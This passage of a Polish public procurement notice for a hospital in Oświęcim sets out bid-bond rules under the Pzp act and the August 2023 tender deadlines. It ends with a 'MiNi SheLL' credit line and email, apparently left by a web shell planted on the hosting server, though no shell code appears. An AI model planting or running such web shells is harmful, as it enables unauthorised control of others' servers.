bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust.6 ustawy Pzp. Inne zapisy w treści gwarancji lub poręczeń (niewynikające z odrębnych, ogólnie obowiązujących przepisów, które winny być wówczas powołane) nie mogą utrudniać Zamawiającemu realizacji swoich praw do zatrzymania wadium wynikających z zapisów ustawy Pzp.<br/>10.	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywała wadium nieprzerwanie do terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt.3 ustawy pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy pzp.<br/>11.	Przy wnoszeniu wadium w innych formach niż pieniądz Wykonawca również winien powołać się na numer i nazwę postępowania, którego wadium dotyczy.<br/>12.	Zamawiający niezwłocznie dokona zwrotu wadium na zasadach przewidzianych w przepisach <br/>art. 98 ust. 1-5 ustawy Pzp. <br/>13.	W ofercie należy podać numer konta (w przypadku wadium wniesionego w pieniądzu), na którem Zamawiający dokona zwrotu wadium.<br/>14.	Zamawiający zatrzymuje wadium, w przypadkach, o których mowa w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szpitaloswiecim.ezamawiajacy.pl/servlet/HomeServlet za pośrednictwem Platformy Zakupowej Marketplanet OnePlace</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-04 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com